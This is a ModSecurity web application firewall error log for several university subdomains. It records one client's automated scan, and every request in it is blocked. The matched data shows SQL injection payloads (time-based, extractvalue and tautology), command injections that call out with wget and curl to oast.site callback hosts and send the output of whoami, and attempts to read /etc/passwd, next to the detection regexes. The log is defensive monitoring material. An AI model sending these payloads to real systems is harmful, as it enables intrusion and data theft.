"OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10ocCo-f0AAAP6NOIAAAAQ"]
[Tue Aug 29 11:31:30.302303 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10osCo-f0AAAQFcS0AAAAn"]
[Tue Aug 29 11:31:30.317696 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10osCo-f0AAAQQylwAAAAy"]
[Tue Aug 29 11:31:30.318803 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQSWMYAAAA0"]
[Tue Aug 29 11:31:30.321371 2023] [:error] [pid 1035] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQLDAAAAAAt"]
[Tue Aug 29 11:31:30.324177 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQTKIIAAAA1"]
[Tue Aug 29 11:31:30.331930 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10osCo-f0AAAPahzcAAAAL"]
[Tue Aug 29 11:31:30.369212 2023] [:error] [pid 1056] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQgqUUAAAAA"]
[Tue Aug 29 11:31:30.406543 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQSWMgAAAA0"]
[Tue Aug 29 11:31:31.304245 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgdiyqw4pbhi1ps.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAQR46IAAAAz"]
[Tue Aug 29 11:31:31.352356 2023] [:error] [pid 1056] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlggdysmwcjnd16w.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAQgqUcAAAAA"]
[Tue Aug 29 11:31:31.356510 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10o8Co-f0AAAQDFUMAAAAl"]
[Tue Aug 29 11:31:31.368343 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10o8Co-f0AAAP5mJIAAAAM"]
[Tue Aug 29 11:31:31.376557 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgd418a8fktopdj.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAQDFUQAAAAl"]
[Tue Aug 29 11:31:31.382675 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgoqb8ft8kja4x9.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAP6NOYAAAAQ"]
[Tue Aug 29 11:31:31.387598 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgphybnpnshcmxx.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAPDn7IAAAAP"]
[Tue Aug 29 11:31:31.390623 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlg9g4z77ra13xkz.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAPahzsAAAAL"]
[Tue Aug 29 11:31:32.335586 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAQJWtQAAAAr"]
[Tue Aug 29 11:31:32.358543 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAPahz0AAAAL"]
[Tue Aug 29 11:31:32.363423 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAQMrr4AAAAu"]
[Tue Aug 29 11:31:32.364434 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAQEGJUAAAAm"]
[Tue Aug 29 11:31:32.383117 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAQMrr8AAAAu"]
[Tue Aug 29 11:31:33.368290 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlgezdwmeecz3onj.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAQMrsEAAAAu"]
[Tue Aug 29 11:31:33.368695 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlgxi9ztg8dtzbi5.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAPah0EAAAAL"]
[Tue Aug 29 11:31:33.370532 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlghtx1hiuxbsj44.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAP@MzgAAAAZ"]
[Tue Aug 29 11:31:33.384399 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pcCo-f0AAAQKOcEAAAAs"]
[Tue Aug 29 11:31:33.423251 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAQMrsIAAAAu"]
